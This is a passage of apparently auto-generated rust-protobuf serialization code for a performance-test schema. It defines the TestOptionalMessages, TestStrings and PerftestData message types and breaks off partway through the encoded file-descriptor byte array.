self.message2.as_mut().unwrap()
}
// Take field
pub fn take_message2(&mut self) -> TestOptionalMessages {
self.message2.take().unwrap_or_else(|| TestOptionalMessages::new())
}
pub fn get_message2<'a>(&'a self) -> &'a TestOptionalMessages {
self.message2.as_ref().unwrap_or_else(|| TestOptionalMessages::default_instance())
}
// optional .TestOptionalMessages message3 = 3;
pub fn clear_message3(&mut self) {
self.message3.clear();
}
pub fn has_message3(&self) -> bool {
self.message3.is_some()
}
// Param is passed by value, moved
pub fn set_message3(&mut self, v: TestOptionalMessages) {
self.message3 = ::protobuf::SingularPtrField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_message3<'a>(&'a mut self) -> &'a mut TestOptionalMessages {
if self.message3.is_none() {
self.message3.set_default();
};
self.message3.as_mut().unwrap()
}
// Take field
pub fn take_message3(&mut self) -> TestOptionalMessages {
self.message3.take().unwrap_or_else(|| TestOptionalMessages::new())
}
pub fn get_message3<'a>(&'a self) -> &'a TestOptionalMessages {
self.message3.as_ref().unwrap_or_else(|| TestOptionalMessages::default_instance())
}
}
impl ::protobuf::Message for TestOptionalMessages {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.message1.set_default();
try!(is.merge_message(tmp))
},
2 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.message2.set_default();
try!(is.merge_message(tmp))
},
3 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.message3.set_default();
try!(is.merge_message(tmp))
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in self.message1.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.message2.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.message3.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
if let Some(v) = self.message1.as_ref() {
try!(os.write_tag(1, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
if let Some(v) = self.message2.as_ref() {
try!(os.write_tag(2, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
if let Some(v) = self.message3.as_ref() {
try!(os.write_tag(3, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<TestOptionalMessages>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for TestOptionalMessages {
fn new() -> TestOptionalMessages {
TestOptionalMessages::new()
}
fn descriptor_static(_: ::std::option::Option<TestOptionalMessages>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_singular_message_accessor(
"message1",
TestOptionalMessages::has_message1,
TestOptionalMessages::get_message1,
));
fields.push(::protobuf::reflect::accessor::make_singular_message_accessor(
"message2",
TestOptionalMessages::has_message2,
TestOptionalMessages::get_message2,
));
fields.push(::protobuf::reflect::accessor::make_singular_message_accessor(
"message3",
TestOptionalMessages::has_message3,
TestOptionalMessages::get_message3,
));
::protobuf::reflect::MessageDescriptor::new::<TestOptionalMessages>(
"TestOptionalMessages",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for TestOptionalMessages {
fn clear(&mut self) {
self.clear_message1();
self.clear_message2();
self.clear_message3();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for TestOptionalMessages {
fn eq(&self, other: &TestOptionalMessages) -> bool {
self.message1 == other.message1 &&
self.message2 == other.message2 &&
self.message3 == other.message3 &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for TestOptionalMessages {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct TestStrings {
// message fields
s1: ::protobuf::SingularField<::std::string::String>,
s2: ::protobuf::SingularField<::std::string::String>,
s3: ::protobuf::SingularField<::std::string::String>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl TestStrings {
pub fn new() -> TestStrings {
::std::default::Default::default()
}
pub fn default_instance() -> &'static TestStrings {
static mut instance: ::protobuf::lazy::Lazy<TestStrings> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const TestStrings,
};
unsafe {
instance.get(|| {
TestStrings {
s1: ::protobuf::SingularField::none(),
s2: ::protobuf::SingularField::none(),
s3: ::protobuf::SingularField::none(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// optional string s1 = 1;
pub fn clear_s1(&mut self) {
self.s1.clear();
}
pub fn has_s1(&self) -> bool {
self.s1.is_some()
}
// Param is passed by value, moved
pub fn set_s1(&mut self, v: ::std::string::String) {
self.s1 = ::protobuf::SingularField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_s1<'a>(&'a mut self) -> &'a mut ::std::string::String {
if self.s1.is_none() {
self.s1.set_default();
};
self.s1.as_mut().unwrap()
}
// Take field
pub fn take_s1(&mut self) -> ::std::string::String {
self.s1.take().unwrap_or_else(|| ::std::string::String::new())
}
pub fn get_s1<'a>(&'a self) -> &'a str {
match self.s1.as_ref() {
Some(v) => &v,
None => "",
}
}
// optional string s2 = 2;
pub fn clear_s2(&mut self) {
self.s2.clear();
}
pub fn has_s2(&self) -> bool {
self.s2.is_some()
}
// Param is passed by value, moved
pub fn set_s2(&mut self, v: ::std::string::String) {
self.s2 = ::protobuf::SingularField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_s2<'a>(&'a mut self) -> &'a mut ::std::string::String {
if self.s2.is_none() {
self.s2.set_default();
};
self.s2.as_mut().unwrap()
}
// Take field
pub fn take_s2(&mut self) -> ::std::string::String {
self.s2.take().unwrap_or_else(|| ::std::string::String::new())
}
pub fn get_s2<'a>(&'a self) -> &'a str {
match self.s2.as_ref() {
Some(v) => &v,
None => "",
}
}
// optional string s3 = 3;
pub fn clear_s3(&mut self) {
self.s3.clear();
}
pub fn has_s3(&self) -> bool {
self.s3.is_some()
}
// Param is passed by value, moved
pub fn set_s3(&mut self, v: ::std::string::String) {
self.s3 = ::protobuf::SingularField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_s3<'a>(&'a mut self) -> &'a mut ::std::string::String {
if self.s3.is_none() {
self.s3.set_default();
};
self.s3.as_mut().unwrap()
}
// Take field
pub fn take_s3(&mut self) -> ::std::string::String {
self.s3.take().unwrap_or_else(|| ::std::string::String::new())
}
pub fn get_s3<'a>(&'a self) -> &'a str {
match self.s3.as_ref() {
Some(v) => &v,
None => "",
}
}
}
impl ::protobuf::Message for TestStrings {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.s1.set_default();
try!(is.read_string_into(tmp))
},
2 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.s2.set_default();
try!(is.read_string_into(tmp))
},
3 => {
if wire_type != ::protobuf::wire_format::WireTypeLengthDelimited {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = self.s3.set_default();
try!(is.read_string_into(tmp))
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in self.s1.iter() {
my_size += ::protobuf::rt::string_size(1, &value);
};
for value in self.s2.iter() {
my_size += ::protobuf::rt::string_size(2, &value);
};
for value in self.s3.iter() {
my_size += ::protobuf::rt::string_size(3, &value);
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);<|fim▁hole|> my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
if let Some(v) = self.s1.as_ref() {
try!(os.write_string(1, &v));
};
if let Some(v) = self.s2.as_ref() {
try!(os.write_string(2, &v));
};
if let Some(v) = self.s3.as_ref() {
try!(os.write_string(3, &v));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<TestStrings>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for TestStrings {
fn new() -> TestStrings {
TestStrings::new()
}
fn descriptor_static(_: ::std::option::Option<TestStrings>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_singular_string_accessor(
"s1",
TestStrings::has_s1,
TestStrings::get_s1,
));
fields.push(::protobuf::reflect::accessor::make_singular_string_accessor(
"s2",
TestStrings::has_s2,
TestStrings::get_s2,
));
fields.push(::protobuf::reflect::accessor::make_singular_string_accessor(
"s3",
TestStrings::has_s3,
TestStrings::get_s3,
));
::protobuf::reflect::MessageDescriptor::new::<TestStrings>(
"TestStrings",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for TestStrings {
fn clear(&mut self) {
self.clear_s1();
self.clear_s2();
self.clear_s3();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for TestStrings {
fn eq(&self, other: &TestStrings) -> bool {
self.s1 == other.s1 &&
self.s2 == other.s2 &&
self.s3 == other.s3 &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for TestStrings {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct PerftestData {
// message fields
test1: ::protobuf::RepeatedField<Test1>,
test_repeated_bool: ::protobuf::RepeatedField<TestRepeatedBool>,
test_repeated_messages: ::protobuf::RepeatedField<TestRepeatedMessages>,
test_optional_messages: ::protobuf::RepeatedField<TestOptionalMessages>,
test_strings: ::protobuf::RepeatedField<TestStrings>,
test_repeated_packed_int32: ::protobuf::RepeatedField<TestRepeatedPackedInt32>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl PerftestData {
pub fn new() -> PerftestData {
::std::default::Default::default()
}
pub fn default_instance() -> &'static PerftestData {
static mut instance: ::protobuf::lazy::Lazy<PerftestData> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const PerftestData,
};
unsafe {
instance.get(|| {
PerftestData {
test1: ::protobuf::RepeatedField::new(),
test_repeated_bool: ::protobuf::RepeatedField::new(),
test_repeated_messages: ::protobuf::RepeatedField::new(),
test_optional_messages: ::protobuf::RepeatedField::new(),
test_strings: ::protobuf::RepeatedField::new(),
test_repeated_packed_int32: ::protobuf::RepeatedField::new(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// repeated .Test1 test1 = 1;
pub fn clear_test1(&mut self) {
self.test1.clear();
}
// Param is passed by value, moved
pub fn set_test1(&mut self, v: ::protobuf::RepeatedField<Test1>) {
self.test1 = v;
}
// Mutable pointer to the field.
pub fn mut_test1<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<Test1> {
&mut self.test1
}
// Take field
pub fn take_test1(&mut self) -> ::protobuf::RepeatedField<Test1> {
::std::mem::replace(&mut self.test1, ::protobuf::RepeatedField::new())
}
pub fn get_test1<'a>(&'a self) -> &'a [Test1] {
&self.test1
}
// repeated .TestRepeatedBool test_repeated_bool = 2;
pub fn clear_test_repeated_bool(&mut self) {
self.test_repeated_bool.clear();
}
// Param is passed by value, moved
pub fn set_test_repeated_bool(&mut self, v: ::protobuf::RepeatedField<TestRepeatedBool>) {
self.test_repeated_bool = v;
}
// Mutable pointer to the field.
pub fn mut_test_repeated_bool<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedBool> {
&mut self.test_repeated_bool
}
// Take field
pub fn take_test_repeated_bool(&mut self) -> ::protobuf::RepeatedField<TestRepeatedBool> {
::std::mem::replace(&mut self.test_repeated_bool, ::protobuf::RepeatedField::new())
}
pub fn get_test_repeated_bool<'a>(&'a self) -> &'a [TestRepeatedBool] {
&self.test_repeated_bool
}
// repeated .TestRepeatedMessages test_repeated_messages = 3;
pub fn clear_test_repeated_messages(&mut self) {
self.test_repeated_messages.clear();
}
// Param is passed by value, moved
pub fn set_test_repeated_messages(&mut self, v: ::protobuf::RepeatedField<TestRepeatedMessages>) {
self.test_repeated_messages = v;
}
// Mutable pointer to the field.
pub fn mut_test_repeated_messages<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedMessages> {
&mut self.test_repeated_messages
}
// Take field
pub fn take_test_repeated_messages(&mut self) -> ::protobuf::RepeatedField<TestRepeatedMessages> {
::std::mem::replace(&mut self.test_repeated_messages, ::protobuf::RepeatedField::new())
}
pub fn get_test_repeated_messages<'a>(&'a self) -> &'a [TestRepeatedMessages] {
&self.test_repeated_messages
}
// repeated .TestOptionalMessages test_optional_messages = 4;
pub fn clear_test_optional_messages(&mut self) {
self.test_optional_messages.clear();
}
// Param is passed by value, moved
pub fn set_test_optional_messages(&mut self, v: ::protobuf::RepeatedField<TestOptionalMessages>) {
self.test_optional_messages = v;
}
// Mutable pointer to the field.
pub fn mut_test_optional_messages<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestOptionalMessages> {
&mut self.test_optional_messages
}
// Take field
pub fn take_test_optional_messages(&mut self) -> ::protobuf::RepeatedField<TestOptionalMessages> {
::std::mem::replace(&mut self.test_optional_messages, ::protobuf::RepeatedField::new())
}
pub fn get_test_optional_messages<'a>(&'a self) -> &'a [TestOptionalMessages] {
&self.test_optional_messages
}
// repeated .TestStrings test_strings = 5;
pub fn clear_test_strings(&mut self) {
self.test_strings.clear();
}
// Param is passed by value, moved
pub fn set_test_strings(&mut self, v: ::protobuf::RepeatedField<TestStrings>) {
self.test_strings = v;
}
// Mutable pointer to the field.
pub fn mut_test_strings<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestStrings> {
&mut self.test_strings
}
// Take field
pub fn take_test_strings(&mut self) -> ::protobuf::RepeatedField<TestStrings> {
::std::mem::replace(&mut self.test_strings, ::protobuf::RepeatedField::new())
}
pub fn get_test_strings<'a>(&'a self) -> &'a [TestStrings] {
&self.test_strings
}
// repeated .TestRepeatedPackedInt32 test_repeated_packed_int32 = 6;
pub fn clear_test_repeated_packed_int32(&mut self) {
self.test_repeated_packed_int32.clear();
}
// Param is passed by value, moved
pub fn set_test_repeated_packed_int32(&mut self, v: ::protobuf::RepeatedField<TestRepeatedPackedInt32>) {
self.test_repeated_packed_int32 = v;
}
// Mutable pointer to the field.
pub fn mut_test_repeated_packed_int32<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedPackedInt32> {
&mut self.test_repeated_packed_int32
}
// Take field
pub fn take_test_repeated_packed_int32(&mut self) -> ::protobuf::RepeatedField<TestRepeatedPackedInt32> {
::std::mem::replace(&mut self.test_repeated_packed_int32, ::protobuf::RepeatedField::new())
}
pub fn get_test_repeated_packed_int32<'a>(&'a self) -> &'a [TestRepeatedPackedInt32] {
&self.test_repeated_packed_int32
}
}
impl ::protobuf::Message for PerftestData {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test1));
},
2 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test_repeated_bool));
},
3 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test_repeated_messages));
},
4 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test_optional_messages));
},
5 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test_strings));
},
6 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.test_repeated_packed_int32));
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in self.test1.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.test_repeated_bool.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.test_repeated_messages.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.test_optional_messages.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.test_strings.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.test_repeated_packed_int32.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
for v in self.test1.iter() {
try!(os.write_tag(1, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.test_repeated_bool.iter() {
try!(os.write_tag(2, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.test_repeated_messages.iter() {
try!(os.write_tag(3, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.test_optional_messages.iter() {
try!(os.write_tag(4, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.test_strings.iter() {
try!(os.write_tag(5, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.test_repeated_packed_int32.iter() {
try!(os.write_tag(6, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<PerftestData>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for PerftestData {
fn new() -> PerftestData {
PerftestData::new()
}
fn descriptor_static(_: ::std::option::Option<PerftestData>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test1",
PerftestData::get_test1,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test_repeated_bool",
PerftestData::get_test_repeated_bool,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test_repeated_messages",
PerftestData::get_test_repeated_messages,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test_optional_messages",
PerftestData::get_test_optional_messages,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test_strings",
PerftestData::get_test_strings,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"test_repeated_packed_int32",
PerftestData::get_test_repeated_packed_int32,
));
::protobuf::reflect::MessageDescriptor::new::<PerftestData>(
"PerftestData",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for PerftestData {
fn clear(&mut self) {
self.clear_test1();
self.clear_test_repeated_bool();
self.clear_test_repeated_messages();
self.clear_test_optional_messages();
self.clear_test_strings();
self.clear_test_repeated_packed_int32();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for PerftestData {
fn eq(&self, other: &PerftestData) -> bool {
self.test1 == other.test1 &&
self.test_repeated_bool == other.test_repeated_bool &&
self.test_repeated_messages == other.test_repeated_messages &&
self.test_optional_messages == other.test_optional_messages &&
self.test_strings == other.test_strings &&
self.test_repeated_packed_int32 == other.test_repeated_packed_int32 &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for PerftestData {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
static file_descriptor_proto_data: &'static [u8] = &[
0x0a, 0x13, 0x70, 0x65, 0x72, 0x66, 0x74, 0x65, 0x73, 0x74, 0x5f, 0x64, 0x61, 0x74, 0x61, 0x2e,
0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, 0x16, 0x0a, 0x05, 0x54, 0x65, 0x73, 0x74, 0x31, 0x12, 0x0d,
0x0a, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x18, 0x01, 0x20, 0x01, 0x28, 0x05, 0x22, 0x22, 0x0a,
0x10, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x42, 0x6f, 0x6f,
0x6c, 0x12, 0x0e, 0x0a, 0x06, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x73, 0x18, 0x01, 0x20, 0x03, 0x28,
0x08, 0x22, 0x2d, 0x0a, 0x17, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65,
0x64, 0x50, 0x61, 0x63, 0x6b, 0x65, 0x64, 0x49, 0x6e, 0x74, 0x33, 0x32, 0x12, 0x12, 0x0a, 0x06,
0x76, 0x61, 0x6c, 0x75, 0x65, 0x73, 0x18, 0x01, 0x20, 0x03, 0x28, 0x05, 0x42, 0x02, 0x10, 0x01,
0x22, 0x94, 0x01, 0x0a, 0x14, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65,
0x64, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x12, 0x28, 0x0a, 0x09, 0x6d, 0x65, 0x73,
0x73, 0x61, 0x67, 0x65, 0x73, 0x31, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54,
0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x4d, 0x65, 0x73, 0x73, 0x61,
0x67, 0x65, 0x73, 0x12, 0x28, 0x0a, 0x09, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x32,
0x18, 0x02, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70,
0x65, 0x61, 0x74, 0x65, 0x64, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x12, 0x28, 0x0a,
0x09, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x33, 0x18, 0x03, 0x20, 0x03, 0x28, 0x0b,
0x32, 0x15, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x4d,
0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x22, 0x91, 0x01, 0x0a, 0x14, 0x54, 0x65, 0x73, 0x74,
0x4f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x61, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73,
0x12, 0x27, 0x0a, 0x08, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x31, 0x18, 0x01, 0x20, 0x01,
0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x4f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x61,
0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x12, 0x27, 0x0a, 0x08, 0x6d, 0x65, 0x73,
0x73, 0x61, 0x67, 0x65, 0x32, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54, 0x65,
0x73, 0x74, 0x4f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x61, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67,
0x65, 0x73, 0x12, 0x27, 0x0a, 0x08, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x33, 0x18, 0x03,
0x20, 0x01, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x4f, 0x70, 0x74, 0x69, 0x6f,
0x6e, 0x61, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x22, 0x31, 0x0a, 0x0b, 0x54,
0x65, 0x73, 0x74, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x12, 0x0a, 0x0a, 0x02, 0x73, 0x31,
0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x12, 0x0a, 0x0a, 0x02, 0x73, 0x32, 0x18, 0x02, 0x20, 0x01,
